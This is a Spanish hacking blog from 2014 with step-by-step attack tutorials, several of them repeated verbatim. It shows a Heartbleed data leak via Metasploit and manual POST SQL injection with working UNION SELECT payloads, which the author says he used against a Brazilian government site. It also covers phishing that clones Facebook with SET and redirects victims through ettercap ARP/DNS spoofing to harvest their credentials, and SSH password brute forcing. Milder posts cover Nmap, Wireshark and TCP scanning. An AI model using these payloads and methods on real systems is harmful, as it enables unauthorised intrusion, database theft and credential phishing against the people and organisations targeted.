¿Qué es Heart Bleed?
Heart
Bleed como su palabra lo dice es una vulnerabilidad muy grave de
OpenSSL qué fue descubierta aproximadamente un mes por ingenieros de
google, está vulnerabilidad nos permite encontrar información
documentalmente secreta y a la vez nos desencrypta la información, pero
ya la vulnerabilidad mayormente ya fue fixeada(parcheada) en casi todas
las websites alojadas obviamente si encontramos algunas websites con
está vulnerabilidad aún no parcheada estamos de suerte entonces, bueno
entonces comenzemos.
Como dice el titulo usaré la herramienta metasploit framework para lograr sacar la información de la website desencryptada, bueno entonces comenzemos colocando lo siguiente en la consola de metasploit framework "search openssl" sin las comillas y nos aparecerá los siguientes auxiliarys y payloads.
Selecionaremos el siguiente auxiliary:
"auxiliary/scanner/ssl/openssl_heartbleed"
Entonces colocaríamos lo siguiente.
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS url
set RPORT 443
run
Daremos enter y nos aparecerá el siguiente enlace.
Y como vemos la website es vulnerable y se nos ha dado el privilegio de enviarnos la información para mí también podemos otorgar las cookies, bueno entonces esto sería todo, hasta la próxima !.
Blog Oswire
Pentesting web, Test de Intrusión, Programación, Criptografía, Ingeniería Inversa, Ingeniería social, Wireless, etcétera.
Archivo del Blog
sábado, 10 de mayo de 2014
sábado, 5 de abril de 2014
Escaneando puerto UDP(User Datagram Protocol)
Hola amigos y lectores, en este post les vengo a explicar como escanear puertos UD(User Datagram Protocol) atravéz de la herramienta de código Libre Nmap, primero les explicare para que se usa está herramienta.
Nmap como su palabra lo dice "Mapeo de Puertos" es una herramienta de Código Libre que es compatible para todo los sistemas operativos(Windows, Linux, Unix, Mac Os, FreeBSD, etc), Nmap se puede utilizar de muchas formas tiene demasiadas utilidades Escaneo de Puertos Tcp / Udp / Etc, los administradores de las websites también utilizan Nmap para ver que peligro puede tener su website atravéz de algún puerto vulnerable que pueda evitar peligrar su website.
También se preguntarán.
¿Qué es UDP(User Datagram Protocol) se basa en el intercambio de Datagramas.
Bueno comenzemos para comenzar escanear Puertos UDP(User Datagram Protocol) necesitariamos el parámetro "-sU" sin las comillas.
Los estados que Nmap Vincula en los puertos UDP serían los siguientes.
- open: Nmap indica este estado cuando existe una respuesta desde el sistema objetivo. No es una situación usual, ya que por lo general el target no responde.
- open/filtered: Esta ambigüedad se debe a que en ciertos casos no es posible validar el estado del puerto. Tal como se indicó anteriormente, debido a que este protocolo no posee alerta de recepción o envío, puede darse el caso en que un puerto se encuentre abierto pero no responda a una determinada cadena de entrada. Nmap envía el paquete en blanco, y en ciertos casos, el servicio detrás del puerto UDP de interés puede tomar los datos de entrada como inválidos y no responder. En el caso de que el puerto se encuentre filtrado por un firewall o un IDS/IPS, el comportamiento puede ser similar. De esta forma, Nmap responde con este tipo de respuesta que puede resultar ambigua.
- closed: Nmap indica este estado cuando existe un error del tipo “ICMP port unreachable error”. Esto es un error de tipo 3. En este caso es posible afirmar que el puerto se encuentra cerrado.
- filtered: Este estado corresponde a algún tipo de error diferente al anterior.
"nmap -sU --top-ports 100 scanme.nmap.org"
Sin las comillas entonces lo pondríamos, como podemos ver el parámetro "-sU" es un parámetro para escanear puertos UDP el "--top-ports" es la respuesta de los puertos Udp, el proceso es demora ya que anda escaneando 100 puertos.
Y como verán se nos ha escaneado los puertos Udp con éxito y también vemos que tengo 98 puertos cerrados.
Bueno esto fue todo espero que hallan entendido ! :) .
Un saludo de Lulz Security Colombia para ustedes mis queridos amigos.
Bye !.
domingo, 16 de marzo de 2014
Inyección SQLi Manual Metodo (POST)
Hola amigos y lectores interesados en aprender...., en este post les vengo a explicar como explotar una Base De Datos manualmente pero esta vez no en metodo GET si no en metodo POST, y bueno se preguntarán.
¿Como qué en metodo Post?
Pués esta vez para utilizar este metodo necesitariamos el complemento add-nos para Mozilla Firefox (Live HTTP Headers), este complemento lo que hace es capturar las cabeceras y el tráfico de donde nosotros hemos entrado además también podremos ver nuestras cookies, bueno empezemos como verán mi victima será la web del gobierno de Brasil pero no la mostrare ya por seguridad.
Bueno entonces comenzemos como explique antes, para este metodo necesitariamos alguna barra de busqueda para comenzar a consultar la base de datos, bueno entonces como podrán ver encontre una barra de busqueda entonces en esa barra colocare cualquier número y nos aparecerá lo siguiente en el complemento add-nos Live HTTP Headers.
Okey y como ven nos ha capturado la cabeceras y ahora haremos lo siguiente, en la primera barra donde aparecera la URL daremos a repetir y nos aparecerá lo siguiente.
Bueno y como vemos la repetición esta en contenido "POST", ahora como vemos en el contenido post nos apareció "busca=1", okey entonces colocaremos una tilde y veremos si es vulnerable o no.
Y como podremos ver es vulnerable la website !, ahora colocaremos lo siguiente para comenzar a consultar la base de datos, comenzaremos colocando "order by unnúmero--+" donde dice unnúmero es donde elegiremos cualquier número que nosotros queramos otra cosa para saber si esta es la columna o no es la columna a veces nos aparecerá nada, algunas otras veces nos aparecerá error algunas otras veces nos aparecerá "Unkown Column" y cuando es la columna pués no tiene que aparecer el complemento completo de la página web, bueno comenzemos colocando "order by 8--+"
Bueno y como vemos no es la columna ahora probemos con "order by 7--+" haber si esta es la columna.
Y como vemós esta si es la columna !, ahora pondremos lo siguiente para que nos comienze a dar las consultas de la base de datos, colocaremos "union select 1,2,3,4,5,6,7--+" sin las comillas y nos aparecerá lo siguiente.
Y como vemós nos apareció el número "2" entonces ese es el que elegiremos para comenzar a consultar la base de datos, entonces borraremos el número "2" y pondremos lo siguiente.
union select 1,group_concat(0x3c62723e,table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--+
Y como verán en la imagen esas son las tablas de la base de datos, ya casi llegamos al último paso, bueno entonces elegiremos la tabla "categorias" para evitarnos problemas al públicar los datos del administrador, okey entonces ahora haremos pondremos lo siguiente.
union select 1,group_concat(0x3c62723e,column_name),3,4,5,6,7 from information_schema.columns where table_name=0x63617465676f72696173--+
Como verán el 0x no significa nada pero el "63617465676f72696173" es el nombre de categorias y como lo encodie, pués muy fácil como se me habia olvidado antes también necesitariamos el complemento HackBar, y en que parte de la sección lo encodeo?, pués muy fácil les pasaré una imagen de la sección.
Le daremos click pondremos el nombre de la tabla y listo estará encodeado, bueno ahora siguamos, colocamos lo que escrbí y nos quedaría así.
Y como vemos nos ha aparecido las columnas de la tabla categorias (id, nome), y como vemos en la imagen solo hay dos entonces pondríamos lo siguiente para completar el resultado de las consultas al sacar la base de datos.
busca=1' union select 1,group_concat(0x3c62723e,0x3d,id,0x3d,nome),3,4,5,6,7 from categorias--+
Y como vemos nos ha sacado la información de la columna !, otra cosa el "0x3d" significa el signo (=) pero en forma en hexadecimal, bueno entonces esto sería todo, hasta la próxima !.
¿Como qué en metodo Post?
Pués esta vez para utilizar este metodo necesitariamos el complemento add-nos para Mozilla Firefox (Live HTTP Headers), este complemento lo que hace es capturar las cabeceras y el tráfico de donde nosotros hemos entrado además también podremos ver nuestras cookies, bueno empezemos como verán mi victima será la web del gobierno de Brasil pero no la mostrare ya por seguridad.
Bueno entonces comenzemos como explique antes, para este metodo necesitariamos alguna barra de busqueda para comenzar a consultar la base de datos, bueno entonces como podrán ver encontre una barra de busqueda entonces en esa barra colocare cualquier número y nos aparecerá lo siguiente en el complemento add-nos Live HTTP Headers.
Okey y como ven nos ha capturado la cabeceras y ahora haremos lo siguiente, en la primera barra donde aparecera la URL daremos a repetir y nos aparecerá lo siguiente.
Bueno y como vemos la repetición esta en contenido "POST", ahora como vemos en el contenido post nos apareció "busca=1", okey entonces colocaremos una tilde y veremos si es vulnerable o no.
Y como podremos ver es vulnerable la website !, ahora colocaremos lo siguiente para comenzar a consultar la base de datos, comenzaremos colocando "order by unnúmero--+" donde dice unnúmero es donde elegiremos cualquier número que nosotros queramos otra cosa para saber si esta es la columna o no es la columna a veces nos aparecerá nada, algunas otras veces nos aparecerá error algunas otras veces nos aparecerá "Unkown Column" y cuando es la columna pués no tiene que aparecer el complemento completo de la página web, bueno comenzemos colocando "order by 8--+"
Bueno y como vemos no es la columna ahora probemos con "order by 7--+" haber si esta es la columna.
Y como vemós esta si es la columna !, ahora pondremos lo siguiente para que nos comienze a dar las consultas de la base de datos, colocaremos "union select 1,2,3,4,5,6,7--+" sin las comillas y nos aparecerá lo siguiente.
Y como vemós nos apareció el número "2" entonces ese es el que elegiremos para comenzar a consultar la base de datos, entonces borraremos el número "2" y pondremos lo siguiente.
union select 1,group_concat(0x3c62723e,table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--+
Y como verán en la imagen esas son las tablas de la base de datos, ya casi llegamos al último paso, bueno entonces elegiremos la tabla "categorias" para evitarnos problemas al públicar los datos del administrador, okey entonces ahora haremos pondremos lo siguiente.
union select 1,group_concat(0x3c62723e,column_name),3,4,5,6,7 from information_schema.columns where table_name=0x63617465676f72696173--+
Como verán el 0x no significa nada pero el "63617465676f72696173" es el nombre de categorias y como lo encodie, pués muy fácil como se me habia olvidado antes también necesitariamos el complemento HackBar, y en que parte de la sección lo encodeo?, pués muy fácil les pasaré una imagen de la sección.
Le daremos click pondremos el nombre de la tabla y listo estará encodeado, bueno ahora siguamos, colocamos lo que escrbí y nos quedaría así.
Y como vemos nos ha aparecido las columnas de la tabla categorias (id, nome), y como vemos en la imagen solo hay dos entonces pondríamos lo siguiente para completar el resultado de las consultas al sacar la base de datos.
busca=1' union select 1,group_concat(0x3c62723e,0x3d,id,0x3d,nome),3,4,5,6,7 from categorias--+
Y como vemos nos ha sacado la información de la columna !, otra cosa el "0x3d" significa el signo (=) pero en forma en hexadecimal, bueno entonces esto sería todo, hasta la próxima !.
sábado, 15 de marzo de 2014
Solución de error wireshark
Hola amigos y lectores, en este post ya que es corto super corto les vengo a explicar como solucionar el error de wireshark al no detectar los interfaces, primero lo primero se preguntarán.
¿Qué es wireshark?
WiresHark es una plataforma que se basa en capturar los paquetes de red y el tráfico recorriendo atravéz de cualquier interface puede ser eth0, wlan0, etc, si nosotros de casualidad elegiremos el interface eth0 solo nos capturara nuestro tráfico pero si elegiremos el interface wlan0 capturara los paquetedes de red y tráfico de los equipos que estarán conectados a nuestra red Wi-Fi, bueno comenzemos.
Al iniciar wireshark algunos cuando lo recien instalarón nos aparecerá este error.
Al no nos detectar los interfaces eso significa que no es normal pero pondríamos lo siguiente en la terminal.
sudo chgrp adm /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap
Entonces después de que pondriamos los comandos en la terminal nos aparecerá ya los interfaces ojo otra cosa el comando "sudo" es para los sistemas operativos que no tienen privilegios root, algunos otros sistemas operativos tendrían privilegios root y no es necesario colocar sudo, entonces como les escribí antes nos aparecerá los interfaces.
Bueno entonces esto sería todo, adios y a la próxima !.
¿Qué es wireshark?
WiresHark es una plataforma que se basa en capturar los paquetes de red y el tráfico recorriendo atravéz de cualquier interface puede ser eth0, wlan0, etc, si nosotros de casualidad elegiremos el interface eth0 solo nos capturara nuestro tráfico pero si elegiremos el interface wlan0 capturara los paquetedes de red y tráfico de los equipos que estarán conectados a nuestra red Wi-Fi, bueno comenzemos.
Al iniciar wireshark algunos cuando lo recien instalarón nos aparecerá este error.
Al no nos detectar los interfaces eso significa que no es normal pero pondríamos lo siguiente en la terminal.
sudo chgrp adm /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap
Entonces después de que pondriamos los comandos en la terminal nos aparecerá ya los interfaces ojo otra cosa el comando "sudo" es para los sistemas operativos que no tienen privilegios root, algunos otros sistemas operativos tendrían privilegios root y no es necesario colocar sudo, entonces como les escribí antes nos aparecerá los interfaces.
Bueno entonces esto sería todo, adios y a la próxima !.
Escaneo de puertos tcp con metasploit
Hola amigos y lectores, en este post hoy les vengo a explicar como usar el auxiliary scanner de tcp para escanear puerto, primero lo primero, se preguntarán.
¿Qué es TCP?
TCP(Transmission Control Protocol / Protocolo de Control de Transmisión), esta orientado a la conexión, se basa en el mapeo de puertos también se encarga de fraccionar una información en datagramas (paquetes) cuando una persona se conecta con algún servidor web.
Bueno comenzemos, primero lo primero sería abriendo nuestra consola de metasploit framework y colocando lo siguiente para comenzar a escanear nuestros puertos TCP/IP o alguna otra dirección Ip, antes de nada TCP/IP fue creada por el departamento de DoD(Departament Of Defense) si es que me acuerdo Jeje "TCP/IP" se basa en cualquier conexión de cualquier máquinas(En Plural), bueno entonces comenzariamos colocando "search portscan" sin las comillas y nos aparecerán los siguientes auxiliarys scanners.
Y como veremos nos aparecerán estos auxiliarys de donde les muestro en la imagen, en total hay "8" auxiliarys y solo seleccionaremos uno de ellos, seleccionariamos este auxiliary.
"auxiliary/scanner/portscan/tcp" , entonces pondríamos lo siguiente para estar ya dentro del auxiliary.
use auxiliary/scanner/portscan/tcp le daríamos enter "entrar" y listo ya estaríamos dentro del auxiliary, ahora colocaríamos lo siguiente "show options" para ver las opciones que tendremos del auxiliary.
Seleccionaríamos las siguientes opciones.
set RHOSTS Ip Pública o privada o puede ser de la victima <- no mostraré la dirección ip por seguridad
set THREADS 100 <-- número total de segundos de escaneos TCP
set PORTS <- podremos elegir cualquier puerto ejemplo de 1 - 100000000
run <- comenzara a funcionar el axuiliary y comenzar a escanear los puertos.
Entonces después que colocaríamos las opciones nos comenzaría a escanear, y listo nos ha escaneo satisfactoriamente.
Y como verán no tengo ningún puerto TCP abierto, bueno esto fue todo espero que hallan entendido, hasta la próxima.
¿Qué es TCP?
TCP(Transmission Control Protocol / Protocolo de Control de Transmisión), esta orientado a la conexión, se basa en el mapeo de puertos también se encarga de fraccionar una información en datagramas (paquetes) cuando una persona se conecta con algún servidor web.
Bueno comenzemos, primero lo primero sería abriendo nuestra consola de metasploit framework y colocando lo siguiente para comenzar a escanear nuestros puertos TCP/IP o alguna otra dirección Ip, antes de nada TCP/IP fue creada por el departamento de DoD(Departament Of Defense) si es que me acuerdo Jeje "TCP/IP" se basa en cualquier conexión de cualquier máquinas(En Plural), bueno entonces comenzariamos colocando "search portscan" sin las comillas y nos aparecerán los siguientes auxiliarys scanners.
Y como veremos nos aparecerán estos auxiliarys de donde les muestro en la imagen, en total hay "8" auxiliarys y solo seleccionaremos uno de ellos, seleccionariamos este auxiliary.
"auxiliary/scanner/portscan/tcp" , entonces pondríamos lo siguiente para estar ya dentro del auxiliary.
use auxiliary/scanner/portscan/tcp le daríamos enter "entrar" y listo ya estaríamos dentro del auxiliary, ahora colocaríamos lo siguiente "show options" para ver las opciones que tendremos del auxiliary.
Seleccionaríamos las siguientes opciones.
set RHOSTS Ip Pública o privada o puede ser de la victima <- no mostraré la dirección ip por seguridad
set THREADS 100 <-- número total de segundos de escaneos TCP
set PORTS <- podremos elegir cualquier puerto ejemplo de 1 - 100000000
run <- comenzara a funcionar el axuiliary y comenzar a escanear los puertos.
Entonces después que colocaríamos las opciones nos comenzaría a escanear, y listo nos ha escaneo satisfactoriamente.
Y como verán no tengo ningún puerto TCP abierto, bueno esto fue todo espero que hallan entendido, hasta la próxima.
sábado, 8 de marzo de 2014
(DNS SPOOFING)Utilizando la herramienta Social Engineering Toolkit
Hola amigos y lectores, en este post les vengo a explicar como utilizar el Menú de Sitio de Clonación, bueno ante de todo Social Engineering Toolkit es una herramienta de "Ingeniería Social" como su palabra lo dice se basa en muchos módulos y menús.
En este módulo que usaremos se basa en la suplantación de dominios "NO-IP" (DNS) o viceversa, bueno comenzemos, primero tendríamos que abrir la herramienta Social Engineering Toolkit entonces la ubicación sería la seguiente.
BackTrack >> Explotation Tools >> Social Engineering Tools >> Social Engineering Toolkit >> set
O colocariamos lo siguiente en la terminal:
cd /pentest/exploits/set/
./set
Foto:
Y listo ya tendríamos la consola de Social Engineering Toolkit abierto ahora nos aparecería los siguientes menús.
Foto:
Entonces elegiriamos el Menú 1, entonces pondríamos el número "1" sin las comillas y le daríamos enter y nos aparecerán otros menús.
Foto:
Elegiríamos el menu número "2" sin las comillas y daríamos enter y nos aparecerá otros menus.
Foto:
Entonces elegiríamos el menu 3 y le daríamos enter y nos aparecerá los siguientes menus.
Foto:
Elegiríamos el menu 2 y nos aparecerá lo siguiente para comenzar a clonar un sitio web.
Foto:
Y nos dice que pongamos nuestra dirección Ip, como verán colocaremos nuestra Dirección Ip Local y no dirección Ip Pública y colocaríamos nuestra Dirección Ip y daríamos enter.
Foto:
Entonces clonarimos la website de facebook.com y le daríamos enter y nos quedaría así.
Foto:
Y listo como verán se ha inciado la clonación "OJO" este proceso solo sirve para los demás servidores que estan conectados a la misma red, entonces ahora haríamos lo siguiente, abririamos otra terminal o pestaña como ustedes quierán y colocaríamos lo siguiente:
gedit /usr/local/share/ettercap/etter.dns y le daríamos enter.
Foto:
Y como verán crearemos los siguientes parametros para ingresar el dominio y dirección ip.
Dominio.com A IP
*.Dominio A IP
www.dominio.com PTR IP
Donde dice dominio es obvio que hay pondremos el dominio que clonamos y la dirección Ip y daríamos a guardar, okey después de eso colocariamos para finalizar en la terminal:
ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //
Y daríamos enter para finalizar, ojo donde dice "Adaptador de red" pondriamos el interface de donde estamos conectados una red Local o red Wi-Fi.
Foto:
Y listo ahora colocaríamos en la URL "facebook.com" o nuestra dirección Ip que hemos colocado. sin las comillas y pondríamos nuestro correo y contraseña pero como verán colocare una contraseña falsa.
Foto:
Y como verán nuestra victima se ha echo login con su correo electrónico y contraseña, ojo también podremos clonar otros sitio web.
Bueno espero que hayan entendido este post otra cosa no solo existe este menu también se vendrá otro con el menu de java_signed_applet, hasta pronto !!.
En este módulo que usaremos se basa en la suplantación de dominios "NO-IP" (DNS) o viceversa, bueno comenzemos, primero tendríamos que abrir la herramienta Social Engineering Toolkit entonces la ubicación sería la seguiente.
BackTrack >> Explotation Tools >> Social Engineering Tools >> Social Engineering Toolkit >> set
O colocariamos lo siguiente en la terminal:
cd /pentest/exploits/set/
./set
Foto:
Y listo ya tendríamos la consola de Social Engineering Toolkit abierto ahora nos aparecería los siguientes menús.
Foto:
Entonces elegiriamos el Menú 1, entonces pondríamos el número "1" sin las comillas y le daríamos enter y nos aparecerán otros menús.
Foto:
Elegiríamos el menu número "2" sin las comillas y daríamos enter y nos aparecerá otros menus.
Foto:
Entonces elegiríamos el menu 3 y le daríamos enter y nos aparecerá los siguientes menus.
Foto:
Elegiríamos el menu 2 y nos aparecerá lo siguiente para comenzar a clonar un sitio web.
Foto:
Y nos dice que pongamos nuestra dirección Ip, como verán colocaremos nuestra Dirección Ip Local y no dirección Ip Pública y colocaríamos nuestra Dirección Ip y daríamos enter.
Foto:
Entonces clonarimos la website de facebook.com y le daríamos enter y nos quedaría así.
Foto:
Y listo como verán se ha inciado la clonación "OJO" este proceso solo sirve para los demás servidores que estan conectados a la misma red, entonces ahora haríamos lo siguiente, abririamos otra terminal o pestaña como ustedes quierán y colocaríamos lo siguiente:
gedit /usr/local/share/ettercap/etter.dns y le daríamos enter.
Foto:
Y como verán crearemos los siguientes parametros para ingresar el dominio y dirección ip.
Dominio.com A IP
*.Dominio A IP
www.dominio.com PTR IP
Donde dice dominio es obvio que hay pondremos el dominio que clonamos y la dirección Ip y daríamos a guardar, okey después de eso colocariamos para finalizar en la terminal:
ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //
Y daríamos enter para finalizar, ojo donde dice "Adaptador de red" pondriamos el interface de donde estamos conectados una red Local o red Wi-Fi.
Foto:
Y listo ahora colocaríamos en la URL "facebook.com" o nuestra dirección Ip que hemos colocado. sin las comillas y pondríamos nuestro correo y contraseña pero como verán colocare una contraseña falsa.
Foto:
Y como verán nuestra victima se ha echo login con su correo electrónico y contraseña, ojo también podremos clonar otros sitio web.
Bueno espero que hayan entendido este post otra cosa no solo existe este menu también se vendrá otro con el menu de java_signed_applet, hasta pronto !!.
lunes, 3 de marzo de 2014
Usando módulo auxiliary SSH(SECURE SHELL) mediante metasploit [2]PARTE y última parte
Hola amigos y lectores en este post les vengo a explicar como usar el módulo auxiliary "ssh_login", bueno pero como he visto en el anterior post no explice que era una conexión SSH(SECURE SHELL), bueno venga y se los explico.
¿Que es una conexión SSH?
SSH por su palabra lo dice en español (Shell Seguro) es una de la muchas plataformas que nos permiten conectarnos desde un sistema operativo GNU/LINUX desde windows, pero para esto necesitariamos la herramienta PuTTY. "PuTTY" es una de las herramientas que nos permiten conectarnos a los sistemas operativos GNU/LINUX, ojo pero para esto necesitariamos que tengamos la conexión SSH activada, algunos Sistemas Operativos GNU/LINUX tendrían ya la herramienta instalada e incrustada algunos no y tendrían que instalarla, bueno vamos a ello, de nuevo como les escribi antes usare mi máquina virtual BackTrack 5 R3, lo primero tendriamos que abrir la consola "Metasploit Framework" para comenzar a utilizar este scanner auxiliary, entonces colocaríamos "msfconsole" sin las comillas y daríamos enter, okey y después que se nos habra abierto la consola colocaríamos "search ssh_login" sin las comillas y nos aparecerán los siguientes módulos, ante de todo también esta herramienta se basa en brute force que en español significa "FUERZA BRUTA", fuerza bruta se basa en buscar en distintos diccionarios las contraseñas como en ocasiones de fuerza bruta a conexiones WPA/WEP, es muy peligroso la fuerza bruta por que en algunas conexiones no todas pueden haber archivos importantes, como classificaciones escolares,fotos,etc.
Foto:
Como verán yo tengo desactualizado metasploit pero para los que estarán viendo este post tendrían mas módulos, bueno entonces utilizariamos el módulo "auxiliary/scanner/ssh/ssh_login" y colocaríamos lo siguiente.
use auxiliary/scanner/ssh/ssh_login
show options -> show options es para ver las opciones que tendríamos que elegir.
Foto:
Bueno entonces elegiriamos las siguientes opciones no todas.
set USERNAME
set STOP_ON_SUCCESS
set RHOSTS
set RPORT
set THREADS
exploit
okey entonces pondriamos así.
set USERNAME informix <- nombre de la máquina OS GNU/LINUX
set STOP_ON_SUCCESS true <- es necesario poner true(verdadero) para que nos funcione el proceso
set RHOSTS ipvictima <- Colocaríamos la Ip de nuestra victima osea el OS(SISTEMA OPERATIVO)
set RPORT 22 <- es obvio que los sistema SSH/SECURE SHELL tiene el puerto 22 abierto
set THREADS 100 <- número de veces por segundos
exploit <- lanzamiento del scanner a funcionar osea "explotar"
Bueno entonces nos quedaría así.
Foto:
Y como veríamos se nos comenzo a scanner el auxiliary a la conexión SSH/SECURE SHELL/SHELL SEGURA, bueno después que el proceso se haya escaneo nos quedaría así.
Foto:
Y como verán se nos ha lanzado el usuario y password :) !, bueno y como vierón es demasiado fácil utilizar estos scanners auxiliarys, bueno espero que hayan entendido y adíos.
¿Que es una conexión SSH?
SSH por su palabra lo dice en español (Shell Seguro) es una de la muchas plataformas que nos permiten conectarnos desde un sistema operativo GNU/LINUX desde windows, pero para esto necesitariamos la herramienta PuTTY. "PuTTY" es una de las herramientas que nos permiten conectarnos a los sistemas operativos GNU/LINUX, ojo pero para esto necesitariamos que tengamos la conexión SSH activada, algunos Sistemas Operativos GNU/LINUX tendrían ya la herramienta instalada e incrustada algunos no y tendrían que instalarla, bueno vamos a ello, de nuevo como les escribi antes usare mi máquina virtual BackTrack 5 R3, lo primero tendriamos que abrir la consola "Metasploit Framework" para comenzar a utilizar este scanner auxiliary, entonces colocaríamos "msfconsole" sin las comillas y daríamos enter, okey y después que se nos habra abierto la consola colocaríamos "search ssh_login" sin las comillas y nos aparecerán los siguientes módulos, ante de todo también esta herramienta se basa en brute force que en español significa "FUERZA BRUTA", fuerza bruta se basa en buscar en distintos diccionarios las contraseñas como en ocasiones de fuerza bruta a conexiones WPA/WEP, es muy peligroso la fuerza bruta por que en algunas conexiones no todas pueden haber archivos importantes, como classificaciones escolares,fotos,etc.
Foto:
Como verán yo tengo desactualizado metasploit pero para los que estarán viendo este post tendrían mas módulos, bueno entonces utilizariamos el módulo "auxiliary/scanner/ssh/ssh_login" y colocaríamos lo siguiente.
use auxiliary/scanner/ssh/ssh_login
show options -> show options es para ver las opciones que tendríamos que elegir.
Foto:
Bueno entonces elegiriamos las siguientes opciones no todas.
set USERNAME
set STOP_ON_SUCCESS
set RHOSTS
set RPORT
set THREADS
exploit
okey entonces pondriamos así.
set USERNAME informix <- nombre de la máquina OS GNU/LINUX
set STOP_ON_SUCCESS true <- es necesario poner true(verdadero) para que nos funcione el proceso
set RHOSTS ipvictima <- Colocaríamos la Ip de nuestra victima osea el OS(SISTEMA OPERATIVO)
set RPORT 22 <- es obvio que los sistema SSH/SECURE SHELL tiene el puerto 22 abierto
set THREADS 100 <- número de veces por segundos
exploit <- lanzamiento del scanner a funcionar osea "explotar"
Bueno entonces nos quedaría así.
Foto:
Y como veríamos se nos comenzo a scanner el auxiliary a la conexión SSH/SECURE SHELL/SHELL SEGURA, bueno después que el proceso se haya escaneo nos quedaría así.
Foto:
Y como verán se nos ha lanzado el usuario y password :) !, bueno y como vierón es demasiado fácil utilizar estos scanners auxiliarys, bueno espero que hayan entendido y adíos.
Suscribirse a:
Comentarios (Atom)


































